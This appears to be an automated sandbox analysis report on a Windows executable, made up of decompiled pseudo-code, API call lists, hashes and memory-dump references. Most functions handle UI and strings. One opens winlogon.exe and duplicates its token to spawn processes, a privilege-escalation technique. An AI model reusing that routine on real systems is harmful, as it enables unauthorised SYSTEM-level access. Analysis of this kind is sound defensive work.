                                                                                                                                                                                                                          0x004043d0
                                                                                                                                                                                                                          0x004043d3
                                                                                                                                                                                                                          0x004043da
                                                                                                                                                                                                                          0x004043da
                                                                                                                                                                                                                          0x004043c0
                                                                                                                                                                                                                          0x004043c3
                                                                                                                                                                                                                          0x004043c3
                                                                                                                                                                                                                          0x0040427b
                                                                                                                                                                                                                          0x0040428c
                                                                                                                                                                                                                          0x0040428f
                                                                                                                                                                                                                          0x00404295
                                                                                                                                                                                                                          0x004042a5
                                                                                                                                                                                                                          0x004042b8
                                                                                                                                                                                                                          0x004042cb
                                                                                                                                                                                                                          0x004042de
                                                                                                                                                                                                                          0x004042f1
                                                                                                                                                                                                                          0x00404304
                                                                                                                                                                                                                          0x00404317
                                                                                                                                                                                                                          0x0040432a
                                                                                                                                                                                                                          0x0040433d
                                                                                                                                                                                                                          0x00404350
                                                                                                                                                                                                                          0x00404363
                                                                                                                                                                                                                          0x00404376
                                                                                                                                                                                                                          0x00404389
                                                                                                                                                                                                                          0x0040439c
                                                                                                                                                                                                                          0x004043a4
                                                                                                                                                                                                                          0x004043af
                                                                                                                                                                                                                          0x004043b5
                                                                                                                                                                                                                          0x004043b5
                                                                                                                                                                                                                          0x004043f5

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040421E
                                                                                                                                                                                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00404236
                                                                                                                                                                                                                          • DragFinish.SHELL32(?), ref: 0040423F
                                                                                                                                                                                                                            • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                                                                                                                            • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                                                                                                                            • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                                                                                                                                            • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                                                                                                                                            • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                                                                                                                                                          • BeginDeferWindowPos.USER32 ref: 0040427D
                                                                                                                                                                                                                          • EndDeferWindowPos.USER32(?), ref: 004043A4
                                                                                                                                                                                                                          • InvalidateRect.USER32(?,?,00000001), ref: 004043AF
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DeferWindow$DragRect$BeginClientFileFinishInvalidateItemQuerymemcpymemsetwcslen
                                                                                                                                                                                                                          • String ID: $
                                                                                                                                                                                                                          • API String ID: 2142561256-3993045852
                                                                                                                                                                                                                          • Opcode ID: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                                                                                                                                          • Instruction ID: d1d17b09954fcbdb96c5267886444c332edca9ead5b56a9d6021aa5aec52b2c2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1518EB064011CBFEB126B52CDC9DBF7E6DEF45398F104065BA05792D1C6B84E05EAB4
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00405B81, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 55%
                                                                                                                                                                                                                          			E00405B81(signed short __ebx) {
				signed int _t21;
				void* _t22;
				struct HINSTANCE__* _t25;
				signed int _t27;
				void* _t35;
				signed short _t39;
				signed int _t40;
				void* _t57;
				int _t61;
				void* _t62;
				int _t71;

				_t39 = __ebx;
				if( *0x41c470 == 0) {
					E00405ADF();
				}
				_t40 =  *0x41c468;
				_t21 = 0;
				if(_t40 <= 0) {
					L5:
					_t57 = 0;
				} else {
					while(_t39 !=  *((intOrPtr*)( *0x41c460 + _t21 * 4))) {
						_t21 = _t21 + 1;
						if(_t21 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t57 =  *0x41c458 +  *( *0x41c464 + _t21 * 4) * 2;
				}
				L6:
				if(_t57 != 0) {
					L21:
					_t22 = _t57;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x40fb90 == 0) {
							_push( *0x41c478 - 1);
							_push( *0x41c45c);
							_push(_t39);
							_t25 = E00405CE7();
							goto L15;
						} else {
							wcscpy(0x40fda0, L"strings");
							_t35 = E00405EDD(_t39,  *0x41c45c);
							_t62 = _t62 + 0x10;
							if(_t35 == 0) {
								L13:
								_t25 = GetModuleHandleW(0);
								_push( *0x41c478 - 1);
								_push( *0x41c45c);
								_push(_t39);
								goto L15;
							} else {
								_t61 = wcslen( *0x41c45c);
								if(_t61 == 0) {
									goto L13;
								}
							}
						}
					} else {
						_t25 = GetModuleHandleW(_t57);
						_push( *0x41c478 - 1);
						_push( *0x41c45c);
						_push(_t39 & 0x0000ffff);
						L15:
						_t61 = LoadStringW(_t25, ??, ??, ??);
						_t71 = _t61;
					}
					if(_t71 <= 0) {
						L20:
						_t22 = 0x40c4e8;
					} else {
						_t27 =  *0x41c46c;
						if(_t27 + _t61 + 2 >=  *0x41c470 ||  *0x41c468 >=  *0x41c474) {
							goto L20;
						} else {
							_t57 =  *0x41c458 + _t27 * 2;
							_t14 = _t61 + 2; // 0x2
							memcpy(_t57,  *0x41c45c, _t61 + _t14);
							 *( *0x41c464 +  *0x41c468 * 4) =  *0x41c46c;
							 *( *0x41c460 +  *0x41c468 * 4) = _t39;
							 *0x41c468 =  *0x41c468 + 1;
							 *0x41c46c =  *0x41c46c + _t61 + 1;
							if(_t57 != 0) {
								goto L21;
							} else {
								goto L20;
							}
						}
					}
				}
				return _t22;
			}














                                                                                                                                                                                                                          0x00405b81
                                                                                                                                                                                                                          0x00405b88
                                                                                                                                                                                                                          0x00405b8a
                                                                                                                                                                                                                          0x00405b8a
                                                                                                                                                                                                                          0x00405b8f
                                                                                                                                                                                                                          0x00405b96
                                                                                                                                                                                                                          0x00405b9b
                                                                                                                                                                                                                          0x00405bad
                                                                                                                                                                                                                          0x00405bad
                                                                                                                                                                                                                          0x00405b9d
                                                                                                                                                                                                                          0x00405b9d
                                                                                                                                                                                                                          0x00405ba8
                                                                                                                                                                                                                          0x00405bab
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405bab
                                                                                                                                                                                                                          0x00405be9
                                                                                                                                                                                                                          0x00405be9
                                                                                                                                                                                                                          0x00405baf
                                                                                                                                                                                                                          0x00405bb1
                                                                                                                                                                                                                          0x00405ce2
                                                                                                                                                                                                                          0x00405ce2
                                                                                                                                                                                                                          0x00405bb7
                                                                                                                                                                                                                          0x00405bbd
                                                                                                                                                                                                                          0x00405bf6
                                                                                                                                                                                                                          0x00405c4b
                                                                                                                                                                                                                          0x00405c4c
                                                                                                                                                                                                                          0x00405c52
                                                                                                                                                                                                                          0x00405c53
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405bf8
                                                                                                                                                                                                                          0x00405c02
                                                                                                                                                                                                                          0x00405c0e
                                                                                                                                                                                                                          0x00405c13
                                                                                                                                                                                                                          0x00405c18
                                                                                                                                                                                                                          0x00405c2c
                                                                                                                                                                                                                          0x00405c2e
                                                                                                                                                                                                                          0x00405c3b
                                                                                                                                                                                                                          0x00405c3c
                                                                                                                                                                                                                          0x00405c42
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405c1a
                                                                                                                                                                                                                          0x00405c25
                                                                                                                                                                                                                          0x00405c2a
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405c2a
                                                                                                                                                                                                                          0x00405c18
                                                                                                                                                                                                                          0x00405bbf
                                                                                                                                                                                                                          0x00405bc0
                                                                                                                                                                                                                          0x00405bcd
                                                                                                                                                                                                                          0x00405bce
                                                                                                                                                                                                                          0x00405bd7
                                                                                                                                                                                                                          0x00405c58
                                                                                                                                                                                                                          0x00405c5f
                                                                                                                                                                                                                          0x00405c61
                                                                                                                                                                                                                          0x00405c61
                                                                                                                                                                                                                          0x00405c63
                                                                                                                                                                                                                          0x00405cdb
                                                                                                                                                                                                                          0x00405cdb
                                                                                                                                                                                                                          0x00405c65
                                                                                                                                                                                                                          0x00405c65
                                                                                                                                                                                                                          0x00405c74
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405c84
                                                                                                                                                                                                                          0x00405c8a
                                                                                                                                                                                                                          0x00405c8d
                                                                                                                                                                                                                          0x00405c99
                                                                                                                                                                                                                          0x00405caf
                                                                                                                                                                                                                          0x00405cbd
                                                                                                                                                                                                                          0x00405cc8
                                                                                                                                                                                                                          0x00405cd4
                                                                                                                                                                                                                          0x00405cd9
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405cd9
                                                                                                                                                                                                                          0x00405c74
                                                                                                                                                                                                                          0x00405c63
                                                                                                                                                                                                                          0x00405ce6

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00405C02
                                                                                                                                                                                                                            • Part of subcall function 00405EDD: memset.MSVCRT ref: 00405EF0
                                                                                                                                                                                                                            • Part of subcall function 00405EDD: _itow.MSVCRT ref: 00405EFE
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 00405C20
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                                                                                                                          • LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00405C99
                                                                                                                                                                                                                            • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B19
                                                                                                                                                                                                                            • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B37
                                                                                                                                                                                                                            • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B55
                                                                                                                                                                                                                            • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B73
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                                                                          • String ID: strings
                                                                                                                                                                                                                          • API String ID: 3166385802-3030018805
                                                                                                                                                                                                                          • Opcode ID: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                                                                                                                                          • Instruction ID: 6100db9a332bdf9cdae47e625800c2dd81fdb4e1827941160d8c77da4bb91491
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0417A74188A149FEB149B54ECE5DB73376F785708720813AE802A72A1DB39AC46CF6C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00401E44, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                                          			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
				char _v8;
				void* _v12;
				void* __esi;
				void* _t18;
				intOrPtr* _t22;
				void* _t23;
				void* _t28;
				int _t37;
				intOrPtr* _t39;
				intOrPtr* _t40;

				_v8 = 0;
				_t18 = OpenProcess(0x2000000, 0, _a8);
				_v12 = _t18;
				if(_t18 == 0) {
					_t37 = GetLastError();
				} else {
					_t39 = _a4 + 0x800;
					_a8 = 0;
					E0040289F(_t39);
					_t22 =  *((intOrPtr*)(_t39 + 4));
					if(_t22 == 0) {
						_t23 = 0;
					} else {
						_t23 =  *_t22(_v12, 2,  &_a8);
					}
					if(_t23 == 0) {
						_t37 = GetLastError();
					} else {
						_a4 = _a8;
						E0040289F(_t39);
						_t40 =  *((intOrPtr*)(_t39 + 8));
						if(_t40 == 0) {
							_t28 = 0;
						} else {
							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
						}
						if(_t28 == 0) {
							_t37 = GetLastError();
						} else {
							 *_a12 = _v8;
							_t37 = 0;
						}
						CloseHandle(_a8);
					}
					CloseHandle(_v12);
				}
				return _t37;
			}













                                                                                                                                                                                                                          0x00401e59
                                                                                                                                                                                                                          0x00401e5c
                                                                                                                                                                                                                          0x00401e64
                                                                                                                                                                                                                          0x00401e67
                                                                                                                                                                                                                          0x00401ef9
                                                                                                                                                                                                                          0x00401e6d
                                                                                                                                                                                                                          0x00401e70
                                                                                                                                                                                                                          0x00401e76
                                                                                                                                                                                                                          0x00401e79
                                                                                                                                                                                                                          0x00401e7e
                                                                                                                                                                                                                          0x00401e83
                                                                                                                                                                                                                          0x00401e92
                                                                                                                                                                                                                          0x00401e85
                                                                                                                                                                                                                          0x00401e8e
                                                                                                                                                                                                                          0x00401e8e
                                                                                                                                                                                                                          0x00401e96
                                                                                                                                                                                                                          0x00401ee6
                                                                                                                                                                                                                          0x00401e98
                                                                                                                                                                                                                          0x00401e9b
                                                                                                                                                                                                                          0x00401e9e
                                                                                                                                                                                                                          0x00401ea3
                                                                                                                                                                                                                          0x00401ea8
                                                                                                                                                                                                                          0x00401ebb
                                                                                                                                                                                                                          0x00401eaa
                                                                                                                                                                                                                          0x00401eb7
                                                                                                                                                                                                                          0x00401eb7
                                                                                                                                                                                                                          0x00401ebf
                                                                                                                                                                                                                          0x00401ed3
                                                                                                                                                                                                                          0x00401ec1
                                                                                                                                                                                                                          0x00401ec7
                                                                                                                                                                                                                          0x00401ec9
                                                                                                                                                                                                                          0x00401ec9
                                                                                                                                                                                                                          0x00401ed8
                                                                                                                                                                                                                          0x00401ed8
                                                                                                                                                                                                                          0x00401eeb
                                                                                                                                                                                                                          0x00401eeb
                                                                                                                                                                                                                          0x00401f01

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3
                                                                                                                                                                                                                            • Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                                                                                                                                            • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                                                                                                                                            • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                                                                                                                                            • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                                                                                                                                            • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
                                                                                                                                                                                                                          • String ID: winlogon.exe
                                                                                                                                                                                                                          • API String ID: 1315556178-961692650
                                                                                                                                                                                                                          • Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                                                                                                                                          • Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00405236, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                                                          			E00405236(short* __ebx, intOrPtr _a4) {
				int _v8;
				char _v12;
				void _v2058;
				void _v2060;
				int _t35;
				int _t41;
				signed int _t48;
				signed int _t49;
				signed short* _t50;
				void** _t52;
				void* _t53;
				void* _t54;

				_t48 = 0;
				_v2060 = 0;
				memset( &_v2058, 0, 0x7fe);
				_t54 = _t53 + 0xc;
				 *__ebx = 0;
				_t52 = _a4 + 4;
				_v12 = 2;
				do {
					_push( *_t52);
					_t6 = _t52 - 4; // 0xe80040cb
					_push( *_t6);
					_push(L"%s (%s)");
					_push(0x400);
					_push( &_v2060);
					L0040B1EC();
					_t35 = wcslen( &_v2060);
					_v8 = _t35;
					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
					_t49 = _t48 + _v8 + 1;
					_t41 = wcslen( *_t52);
					_v8 = _t41;
					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
					_t54 = _t54 + 0x34;
					_t52 =  &(_t52[2]);
					_t23 =  &_v12;
					 *_t23 = _v12 - 1;
					_t48 = _t49 + _v8 + 1;
				} while ( *_t23 != 0);
				_t50 = __ebx + _t48 * 2;
				 *_t50 =  *_t50 & 0x00000000;
				_t50[1] = _t50[1] & 0x00000000;
				return __ebx;
			}















                                                                                                                                                                                                                          0x00405241
                                                                                                                                                                                                                          0x00405250
                                                                                                                                                                                                                          0x00405257
                                                                                                                                                                                                                          0x0040525f
                                                                                                                                                                                                                          0x00405262
                                                                                                                                                                                                                          0x00405265
                                                                                                                                                                                                                          0x00405268
                                                                                                                                                                                                                          0x0040526f
                                                                                                                                                                                                                          0x0040526f
                                                                                                                                                                                                                          0x00405277
                                                                                                                                                                                                                          0x00405277
                                                                                                                                                                                                                          0x0040527a
                                                                                                                                                                                                                          0x0040527f
                                                                                                                                                                                                                          0x00405284
                                                                                                                                                                                                                          0x00405285
                                                                                                                                                                                                                          0x00405291
                                                                                                                                                                                                                          0x00405296
                                                                                                                                                                                                                          0x004052a9
                                                                                                                                                                                                                          0x004052b3
                                                                                                                                                                                                                          0x004052b7
                                                                                                                                                                                                                          0x004052bc
                                                                                                                                                                                                                          0x004052ca
                                                                                                                                                                                                                          0x004052d2
                                                                                                                                                                                                                          0x004052d5
                                                                                                                                                                                                                          0x004052d8
                                                                                                                                                                                                                          0x004052d8
                                                                                                                                                                                                                          0x004052db
                                                                                                                                                                                                                          0x004052db
                                                                                                                                                                                                                          0x004052e1
                                                                                                                                                                                                                          0x004052e4
                                                                                                                                                                                                                          0x004052e8
                                                                                                                                                                                                                          0x004052f2

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                                                                          • String ID: %s (%s)
                                                                                                                                                                                                                          • API String ID: 3979103747-1363028141
                                                                                                                                                                                                                          • Opcode ID: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                                                                                                                                          • Instruction ID: 65e1e814fa0bf8ea8ab085bd6ee3311c73c19872bc06834ae6b579d31858dd7b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C411517280020DEBCF21DF94CC49D8BB7B8FF44308F1144BAE944A7152EB74A6588BD8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040614F, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                                                                                                          			E0040614F(void* __ecx, void* __eflags, struct HWND__* _a4) {
				void _v514;
				short _v516;
				void _v8710;
				short _v8712;
				int _t17;
				WCHAR* _t26;

				E0040B550(0x2204, __ecx);
				_v8712 = 0;
				memset( &_v8710, 0, 0x2000);
				_t17 = GetDlgCtrlID(_a4);
				_t34 = _t17;
				GetWindowTextW(_a4,  &_v8712, 0x1000);
				if(_t17 > 0 && _v8712 != 0) {
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					GetClassNameW(_a4,  &_v516, 0xff);
					_t26 =  &_v516;
					_push(L"sysdatetimepick32");
					_push(_t26);
					L0040B278();
					if(_t26 != 0) {
						E00406025(_t34,  &_v8712);
					}
				}
				return 1;
			}









                                                                                                                                                                                                                          0x00406157
                                                                                                                                                                                                                          0x0040616d
                                                                                                                                                                                                                          0x00406174
                                                                                                                                                                                                                          0x0040617f
                                                                                                                                                                                                                          0x00406185
                                                                                                                                                                                                                          0x00406196
                                                                                                                                                                                                                          0x0040619e
                                                                                                                                                                                                                          0x004061b6
                                                                                                                                                                                                                          0x004061bd
                                                                                                                                                                                                                          0x004061d4
                                                                                                                                                                                                                          0x004061da
                                                                                                                                                                                                                          0x004061e0
                                                                                                                                                                                                                          0x004061e5
                                                                                                                                                                                                                          0x004061e6
                                                                                                                                                                                                                          0x004061ef
                                                                                                                                                                                                                          0x004061f9
                                                                                                                                                                                                                          0x004061ff
                                                                                                                                                                                                                          0x004061ef
                                                                                                                                                                                                                          0x00406206

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                                                                          • String ID: sysdatetimepick32
                                                                                                                                                                                                                          • API String ID: 1028950076-4169760276
                                                                                                                                                                                                                          • Opcode ID: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                                                                                                                                          • Instruction ID: a6c41b950ec0abdba219e0cd23eeccead18917629e413d377b87badc6c60029b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65117732840119BAEB20EB95DC89EDF777CEF04754F0040BAF518F1192E7345A81CA9D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00404706, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52librarywindowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                                                          			E00404706(long __edi, wchar_t* _a4) {
				short _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t8 = 0;
				_t14 = 0x1100;
				if(__edi - 0x834 <= 0x383) {
					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
					if(0 != 0) {
						_t14 = 0x1900;
					}
				}
				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = wcscpy(_a4, 0x40c4e8);
				} else {
					if(wcslen(_v8) < 0x400) {
						wcscpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}








                                                                                                                                                                                                                          0x00404706
                                                                                                                                                                                                                          0x00404714
                                                                                                                                                                                                                          0x0040471c
                                                                                                                                                                                                                          0x00404721
                                                                                                                                                                                                                          0x0040472b
                                                                                                                                                                                                                          0x00404733
                                                                                                                                                                                                                          0x00404735
                                                                                                                                                                                                                          0x00404735
                                                                                                                                                                                                                          0x00404733
                                                                                                                                                                                                                          0x00404751
                                                                                                                                                                                                                          0x00404780
                                                                                                                                                                                                                          0x00404753
                                                                                                                                                                                                                          0x0040475e
                                                                                                                                                                                                                          0x00404766
                                                                                                                                                                                                                          0x0040476c
                                                                                                                                                                                                                          0x00404770
                                                                                                                                                                                                                          0x00404770
                                                                                                                                                                                                                          0x0040478a

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004047FA,?,?,?,004035EB,?,?), ref: 0040472B
                                                                                                                                                                                                                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB), ref: 00404749
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 00404756
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00404766
                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB,?), ref: 00404770
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00404780
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
